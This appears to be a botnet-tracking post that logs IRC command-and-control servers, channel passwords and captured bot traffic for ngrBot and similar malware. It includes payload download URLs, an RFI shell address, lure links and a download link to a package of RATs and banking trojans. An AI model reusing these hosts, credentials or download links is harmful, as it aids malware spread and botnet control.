Looks like ngrBot, the reptile mod made by fubar and jam3s, is spreading a lot. Resolved : [jskd6c.jumpingcrab.com] To [184.107.143.126] Remote Host Port Number 184.107.143.126 2009 and 6667 PASS ngrBot 213.251.170.52 80 70.85.227.66 80 PRIVMSG #root :[HTTP]: Updated HTTP spread message to “juas juaz mira esto bajalo 😀 http://bit.ly/kgPE5S” PRIVMSG #root :[d=”http://www.befordsouthpointford.com/bfam/Ford.Mustang.Cobra.2011.JPEG.EXE” s=”143360 bytes”] Executed file
ziggy.no-ip.org(botnet hosted in Canada Frantech Solutions)
Remote Host Port Number 205.185.122.148 6667 PASS nickz23 205.185.122.148 80 NICK {NEW}[USA][XP-SP2]976017 USER 4242 “” “lol” :4242 PONG :D78F0ECE JOIN #bots * The data identified by the following URL was then requested from the remote web server: o http://ziggy.no-ip.org/lsass.exe hosting infos: http://whois.domaintools.com/205.185.122.148
209.172.59.146(ngrBot hosted in Canada Toronto Iweb Technologies Inc)
Remote Host Port Number 209.172.59.146 5794 PASS ngrBot 213.251.170.52 80 74.53.197.4 80 NICK n{US|XPa}pvcbajf USER pvcbajf 0 0 :pvcbajf JOIN #butowski ngrBot PRIVMSG #butowski :[DNS]: Blocked 0 domain(s) – Redirected 15 domain(s) The data identified by the following URLs was then requested from the remote web server: http://api.wipmania.com/ http://conectaamor.com/_server/editor/images/dominios.txt EXE File: http://conectaamor.com/_server/editor/images/fudnew2.exe RFI SHELL: http://conectaamor.com/_server/editor/images/lang.php
irc.raidzone.net(irc botnet hosted in United States Lansing Liquid Web Inc)
50.28.21.18:8890 Nick: New|AUT|1244036|XP Username: 7665336 Joined Channel: #pedophiliac with Password YDARIO Remote Host Port Number 50.28.21.18 7659 PASS fuck NICK [3151|USA|XP|Z3R0x] USER 3151 “” “lol” :3151 JOIN #pedophiliac YDARIO PONG 422 hosting infos: http://whois.domaintools.com/50.28.21.18
42mb malware samples
This package has a lot of RATs and banking trojans inside, have fun. Download: http://c3266cfc.tubeviral.com
115.239.230.73(irc botnet hosted in China Zhejiang Ninbo Lanzhong Network Ltd)
Remote Host Port Number 115.239.230.73 6943 PASS laorosr 213.251.170.52 80 31.184.237.43 80 98.126.35.112 80 MODE [N00_USA_XP_1295223] @ -ix 00000000 | 5041 5353 206C 616F 726F 7372 0D0A 5052 | PASS laorosr..PR 00000010 | 5256 4D53 4720 5B4E 3030 5F55 5341 5F58 | RVMSG [N00_USA_X 00000020 | 505F 3132 3935 BCB9 4020 3A20 5261 6E64 |
92.241.165.115(irc botnet hosted in Russian Federation Oao Webalta)
Remote Host Port Number 213.251.170.52 80 92.241.165.115 1863 PASS ngrBot NICK n{US|XPa}qgaqcrq USER qgaqcrq 0 0 :qgaqcrq JOIN #start romeo Now talking in #start Topic On: [ #start ] [ *mdns http://www.abbygamerz.net/foro/index *msn.int 5 *msn.set viste las fotos nuevas de mi facebook? http://adf.ly/1gYW7 ] Topic By: [ ecu ] hosting infos: http://whois.domaintools.com/92.241.164.67
c0re.su(irc botnet hosted in Russian Federation Mir Telematiki Ltd)
Remote Host Port Number c0re.su 4443 NICK N[USA|XP][yiowryo] USER yiow “” “lol” :yiow JOIN #b0ts NICK N[USA|XP][uuobuyk] USER uuob “” “lol” :uuob NICK [USA-XP][ftlizjn] USER 2844 “” “TsGh” :2844 JOIN #botz NICK [USA-XP][qirnfam] USER 9143 “” “TsGh” :9143 NICK [n][USA-XP][ihcnykp] USER 2550 “” “TsGh” :2550 hosting infos: http://whois.domaintools.com/46.17.100.229
91.215.159.137(irc botnet hosted in Netherlands Amsterdam Infinite Technologies Internet Solutions Limited)
Remote Host Port Number 112.78.8.20 80 195.122.131.3 80 213.251.170.52 80 91.215.159.137 1866 PASS ngrBot PRIVMSG #!hot! :[DNS]: Blocked 1259 domain(s) – Redirected 0 domain(s) PRIVMSG #!hot! :[d=”http://rapidshare.com/files/2997295683/nap.exe”] Error downloading file [e=”12039″] NICK n{US|XPa}aytockz USER aytockz 0 0 :aytockz JOIN #!hot! ngrBot PRIVMSG #!hot! :[HTTP]: Updated HTTP spread interval to “5” PRIVMSG #!hot! :[HTTP]: Updated HTTP
193.107.16.111(irc botnet hosted in Seychelles Ideal Solution Ltd)
Remote Host Port Number 193.107.16.111 7654 PASS ngrBot 213.251.170.52 80 66.45.255.234 80 NICK n{US|XPa}cucqohu USER cucqohu 0 0 :cucqohu JOIN #oldgold noKIDs PRIVMSG #oldgold :[d=”http://gloimpsa.com/js/expressInstall.swf.exe” s=”167936 bytes”] Updated bot file “C:\Documents and Settings\UserName\Application Data\Fdxaxf.exe” – Download retries: 0 hosting infos: http://whois.domaintools.com/193.107.16.111